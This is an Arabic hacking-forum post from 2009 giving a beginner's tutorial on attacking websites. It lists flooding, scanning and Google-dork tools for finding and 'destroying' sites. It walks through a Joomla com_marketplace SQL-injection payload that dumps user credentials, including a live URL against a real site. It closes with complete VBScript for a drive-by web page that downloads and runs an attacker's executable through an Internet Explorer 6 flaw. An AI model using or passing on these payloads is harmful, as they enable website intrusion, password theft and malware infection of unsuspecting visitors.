شلونكم شباب
اول شي سوفا اعطيكم الادوات المستخدمه في اختراق المواقع وتحت كل ادات امكانياتها
ملاحظه \ هذي الدروس خاليه من راوابط التحميل
################################################## ###
اولاً
1-برنامج KSA-SEED-SITES1
http://h1.badwaresite.www/KSASEED/KSA-SEED-SITES11111111.PNGوهذا البرنامج يعتمد على 9 ثغرات فقط ولكنها قويه جدأ وهذا البرنامج برمجه سعوديه
على ما اضن انه لاحد اعضاء العاصفه
------------------------------------------------------------------------------------------
2-برنامج AIORS وهو متخصص في الرابد شير المعروف با انه اقوى وا اكبر موقع لرفع الملفات بجميع الصيغ
ولكن هذا الموقع ليسمح الا با ملف وحد في كل تحميل وايضن لزم تنتضر 50 او30 ثانيه قبل التحميل وهذا يضايق بعظ من الناس زلكن هذا البرنامج كسر هذي القواعد بقوه وا اي ضن فيه خصائص جميله
https://2img.net/h/oi5.tinypic.com/87dw4ko.png-يقوم البرنامج بأزالة الكوكيز التي يقوم الرابيدشير بأخفائها في النظام
2-خاصية تنزيل أكثر من ملف في وقت واحد
3-يقوم هذا البرنامج المدمج بعمل ريستارت للروتر أو تغير الاي بي أذا لم يجد الروتر وكل ذلك بضغطة واحدة
4-برنامج متميز في التحميل من رابيد شير ملف تنصيب
5-برنامج أخر متميز ملف تنصتب
6-من أفضل البرامج في المحافظة علي الرابط الأصلي داخل موقع الرابيدشير الي حين الأستخدام
وهنا يأتي أنفراد فنان سوفت
7-خاصية البحث عن جميع الكتب الألكترونية داخل الرابيدشير
8-خاصية البحث عن جميع صيغ الأفلام داخل الرابيدشير
9-خاصية البحث عن البرامج
10-أظهار جميع الملفات في الرابيدشير
وفي الأخر والأهم موقع لمجموعة بروكسيات جميل جدا ومتجدد
----------------------------------------------------------------------------------------------------
3-برنامج SynAttack exe وهو بوت قوي لتدمير المواقع وانا شفت هذا الدرس من منتدى العاصفه لصغو اكثر من رائع
رابط الشرح
http://www.3asfh.net/vb/showthread.php?t=89449-----------------------------------------------------------------------------------------------
4- برنامج N-Stealth
http://www.khayma.com/koonooz/img/NStealth3.2.gifوهو لفحص الموقع او حتى سيرفر بكبره لن البرنامج قوي جداً
وانا استعملته لكن يبيله طولت بال لانه يفحص الموقع من الى
--------------------------------------------------------------------------------------------------
5- برنامج IntelliTamper
http://www.linux-pour-lesnuls.com/intellitamper2.jpgهو يعتبر من اقوى البرامج لكشف ملفات الموقع المرفوعه عن طريق برنامج الـFTP المشهور جداً طيب انا استخدمته على اكبر المواقع وطلعلي ملفات الموقع كلها
-----------------------------------------------------------------------------------------------------
6- برنامج Cypr0n string tool v1.0
https://2img.net/r/ihimizer/img212/7403/googlemg4.jpgبرنامج قوي جداً لكن للاسف ليسا فيه لستت ثغرات ممكن تستعين بلستت ثغران برنامج عمران او اخر الثغرات في الـ MILW0RM وسوفا اعلمكم كيف اخراج كود الثغره وا الاستغلال في اخر الدرس وا ايضن فيه خصيه انك تبحث عن ثغره في الـGOOGLE وخراج المواقع المصابه
-----------------------------------------------------------------------------------------------------
7- برنامج JAAScoisAW
http://www.alganad.com/wp_files/JAAScoisAWI.jpgI وهو من اقوى البرامج في تحليل المواقع او المنتدى وا اخراج
السكربت المصاب مع الاستغلال
-----------------------------------------------------------------------------------------------
8-Googler Scan
http://blogmlk.files.wordpress.com/2...ooglerscan.jpgهو عباره عن برنامج تحط فيه كود الثغره او اسم الثغره وتحط بحث وا يجيبلك كل المواقع المصابه با هذي الثغره با قوقل
------------------------------------------------------------------------------------------------------
9-برنامج evilping
http://www.mas10.malware-site.www/evilping.jpgهوه عباره عن امر بنق ولكن انت تحدد كم ضربه تريد ان تاصل الى هذا المواقع المراد تدميره وهو قوي جداً
--------------------------------------------------------------------------------------------------------
10- برنامج Shadow Security Scanner
http://pcwin.com/media/images/screen...ityscanner.gifوهو خاص با اخراج الثغرات من موقع السكيرتي معين مدري ايش اسمه لكن الموقع الي يبحث فيه هذا البرنامج قوي جداً وا كل يوم يضع فيه ثغرات جديده با كميه جيده
--------------------------------------------------------------------------------------------------
11- برنامج WebBrowser+of+hack
وهذا البرنامج عباره عن متصفح لكن فيه خاصية تغير اي شي من الموقع مثل اسم الموقع ومثل كذا بس عندك يعني بس تستمتع وا انت تتصفح الموقع
الشرح
http://redir.opera.com/plugins/?application/x-shockwave-flashالان شرح كيف استغلال الثغرات في موقع
www.milw0rm.comوهذا المواقع يعتبر من اقوى المواقع في تنزيل اخر الثغرات ولكن في ناس ما يعرفون كيف يطلوعون الثغرات وا الاستغلال
وخصوصاً المبتدئين
http://www.milw0rm.com/ اضن الكل يعرفه حتى المبتدئين
وعلى فكره سمعت ان كل يوم تنزل اقل شي 4 ثغرات (يومين )
طيب حلوو تقول شلون اطلع الثغره وا الاستتغلال اقول اول شي ادخل الموقع السكيرتي
وبعده اتجه لى قسم ثغرات المواقع الي هو [ web apps ]
دوره تلقاه با النص
طيب ادخل اي وحده فيهن اي ثغره مثل هذي مثلاً
- الكود:
-
###########################################################
Joomla com_marketplace(catid) SQL-injection vulnerability
###########################################################
###################################################
#[~] Author : TR-ShaRk
#[~] Msn :
Starhack@tr-shark.org#[~] Im Not Hacker
#[~] Greetz : FATAL,STR0KE,ARANELWORM,CAKI_DECCAL,CEZOHAN,WEBLOADER
#[~] Orospu Cocuklari; Elitehacker,Netshooter Kardesleri
#[!] Module_Name: com_marketplace
#[!] script_Name: Joomla
#[!] Google_Dork: inurl:"com_marketplace"
#[!] script Download: http://download.joomlaportal.ch/images/stories/loady/komponente/com_marketplace_v131.zip
##################################################
#[~] Example:
http://localhost/Path/index.php?option=com_marketplace&page=show_category&catid=[TR-ShaRk]
#[~] Exploit:
9999+union+select+concat(username,0x3a,password),2,3+from+jos_users--
#[~] LiveDemo:
http://www.mmopa.com/index.php?option=com_marketplace&page=show_category&catid=9999+union+select+concat(username,0x3a,password),2,3+from+jos_users--
###############################
Biz Hic Bir Zaman Kraliz Demedik Bunu Kanitladik
###############################
# milw0rm.com [2008-11-11]
طيب تقولي كله كلام في كلام اقول اول شي دور على كلمة (dork) اذا لقيته راح تلقا قدامه الثغره
الي هي هاذيcom_marketplace
ودور بعد على كلمة (Example) هذي معناته الاستغلال تحت تلقا الرابط بس يبيلك تغير بعض الاشياء في الرابط مثل
localhost الى اسم الموقع
Path الى ملف الي فيه الثغره
فــــــــــــــــــفـــــــــــــــــــــط
اووووو صح فيه كلمه ايضان ابحث عنه مهمه الي هي
Exploit الي تحته هذا الرابط
9999+union+select+concat(username,0x3a,password),2 ,3+from+jos_users--
هذا الرباط بعد زوده على رابطExample
---------------------------------------------------------------------------------------------
طيب انت ايضاً تقدر تنزل سيرفر حق اي برنامج اختراق في اي جهاز عن طريق صفحه ملغومه
طيب شلون تسوي صفحه ملغومه
اول شي سولك حساب مجاني في موقع جيران وراح يسويلك موقع مجاني
وبعد كذا ادخل الى لوحت التحكم وختر الملفات وبعد كذا اختر تحميل
ورفع الصفحه
يب كيف تيوي صفحه ملغووووومة
عن طريق هذا الكود
- الكود:
-
<script language="VBscript">
On Error Resume Next
url = "رابط الباتش"
Set xml = document.createElement("object")
xml.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
Set HTP = xml.CreateObject("Microsoft.XMLHTTP", "")
S1 = "Ad"
S2 = "od"
S3 = "b."
S4 = "ST"
S5 = "re"
S6 = "am"
Set AdbS = xml.CreateObject(S1 & S2 & S3 & S4 & S5 & S6, "")
AdbS.Type = 1
HTP.open "GET", url, False
HTP.Send
Set FSO = xml.CreateObject("scripting.FileSystemObject", "")
Set tmp = FSO.GetSpecialFolder(2)
FileName = FSO.GetFileName(url)
FileName = FSO.BuildPath(tmp, FileName)
AdbS.open
AdbS.write HTP.responseBody
AdbS.SaveToFile FileName, 2
AdbS.Close
Set WSH = xml.CreateObject("Shell.Application", "")
WSH.ShellExecute FileName, "", "", "open", 1
</script>
وبكان
مو مكتوب "رابط الباتش" حط رابط الباتش حقك بس لزم يكون رابط مباشر يعني زي كذا
www.xxx.com/uplods/server.exeيعني لزم يكون مبااااشر يعني بس يضغط على الرابط ويحمله
وبعد كذا احفض ملف الـ TXT هذا بصيغة HTML
وراح يسويلك صفحه ملغومه ورفعها الى مساحتك الخاصه
وهذي الثغره شغاله على متصفح اكسبلولر 6
تحياتي للجميع
أخوكم
محمد البصراوي
أيملي للمراسله
EVELL_HAKAR@YAHOO.COM
موضوع: كل ما اعرفه عن اختراق المواقع سوفا اضعه في هذا الدرس 
الثلاثاء يونيو 09, 2009 5:05 am